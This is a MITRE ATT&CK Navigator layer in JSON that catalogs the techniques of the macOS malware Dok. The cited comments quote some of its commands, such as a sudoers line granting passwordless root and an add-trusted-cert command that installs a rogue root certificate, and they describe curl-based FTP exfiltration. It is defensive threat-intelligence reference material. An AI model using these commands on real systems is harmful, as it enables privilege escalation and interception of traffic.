{"description": "Enterprise techniques used by Dok, ATT&CK software S0281 (v2.0)", "name": "Dok (S0281)", "domain": "enterprise-attack", "versions": {"layer": "4.5", "attack": "17", "navigator": "5.1.0"}, "techniques": [{"techniqueID": "T1548", "showSubtechniques": true}, {"techniqueID": "T1548.003", "comment": "[Dok](https://attack.mitre.org/software/S0281) adds admin  ALL=(ALL) NOPASSWD: ALL to the /etc/sudoers file.(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1557", "comment": "[Dok](https://attack.mitre.org/software/S0281) proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1547", "showSubtechniques": true}, {"techniqueID": "T1547.015", "comment": "[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to install a login Item by sending Apple events to the System Events process.(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059", "showSubtechniques": true}, {"techniqueID": "T1059.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to create a login item for persistence.(Citation: objsee mac malware 2017)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1543", "showSubtechniques": true}, {"techniqueID": "T1543.001", "comment": "[Dok](https://attack.mitre.org/software/S0281) installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format com.random.name.plist.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1048", "showSubtechniques": true}, {"techniqueID": "T1048.003", "comment": "[Dok](https://attack.mitre.org/software/S0281) exfiltrates logs of its execution stored in the /tmp folder over FTP using the curl command.(Citation: hexed osx.dok analysis 2019) ", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1222", "showSubtechniques": true}, {"techniqueID": "T1222.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) gives all users execute permissions for the application using the command chmod +x /Users/Shared/AppStore.app.(Citation: CheckPoint Dok)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1056", "showSubtechniques": true}, {"techniqueID": "T1056.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) prompts the user for credentials.(Citation: objsee mac malware 2017)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1027", "showSubtechniques": true}, {"techniqueID": "T1027.002", "comment": "[Dok](https://attack.mitre.org/software/S0281) is packed with an UPX executable packer.(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1090", "showSubtechniques": true}, {"techniqueID": "T1090.003", "comment": "[Dok](https://attack.mitre.org/software/S0281) downloads and installs [Tor](https://attack.mitre.org/software/S0183) via homebrew.(Citation: objsee mac malware 2017)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1553", "showSubtechniques": true}, {"techniqueID": "T1553.004", "comment": "[Dok](https://attack.mitre.org/software/S0281) installs a root certificate to aid in [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) actions using the command add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename.(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}], "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": 1}, "legendItems": [{"label": "used by Dok", "color": "#66b1ff"}]}